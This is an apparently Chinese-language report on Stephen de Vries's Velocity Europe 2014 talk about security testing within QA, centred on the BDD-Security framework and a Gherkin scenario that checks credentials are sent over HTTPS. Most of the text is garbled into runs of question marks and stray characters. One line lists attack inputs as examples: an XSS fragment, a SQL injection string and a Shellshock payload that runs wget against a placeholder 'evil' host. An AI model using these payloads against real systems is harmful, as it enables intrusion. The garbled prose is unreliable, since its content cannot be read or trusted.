????ContinuumSecurity?????Stephen de Vries????Velocity Europe 2014????????????????????????????????Stephen???????Щ???????????????????QA???????????????????????????????????????????BDD-Security?????????JBehave???????Given-When-Then???????????????
????????????????????????????????????????????????ε?????????????????????????????????????????????????У???????????????????????????????????????????????????????????????Stephen?????????????????????QA?????????????????????????????????????????????濼????????????????????????????????????????С?
??????????QA??????????????????????????????Stephen????C. Maartmann-Moe??Bill Sempf????????????
??????QA?????
????QA?????????????????????????????0??????????999999999???????????????棻????-1?????????????sfdeljknesv??
?????????????
???????????????????????????????????????”>??????????’or 1=1-??????????() { :; }; wget -O /beers http://evil; /???????????????????????????????????У????????????????????????????????????????????????????????????????????????????????м????Stephen????BDD??????????????????????????????????????????BDD-Security??????????
????????BDD-Security?????JBehave???????????????BDD???????????Gherkin?????BDD-Security??????????£?
????Scenario: Transmit authentication credentials over HTTPS
????Meta: @id auth_https
????Given the browser is configured to use an intercepting proxy
????And the proxy logs are cleared
????And the default user logs in with credentials from: users.table
????And the HTTP request-response containing the default credentials is inspected
????Then the protocol should be HTTPS
????BDD-Security??????μ??д?????????????????BDD-Security????????д???
?????????????????e??????????????????????????????????????ζ????????????????????С????????????????У????????????????
??????????BDD-Security????????????????????????а???????????????????????????д????????е???2?????????——??????????м??ɡ?????????????????????????д?????????????
????BDD-Security?????????????????????????о????????????????????????衣??Щ??????OWASP ZAP??Nessus???
????Stephen?????????Щ????????????????Zap-WebDriver???????????????????BDD????????????????????Gauntlt??BDD-Security??????????????BDD???????????????????Ruby??Mittn??Python??д???????????Gherkin??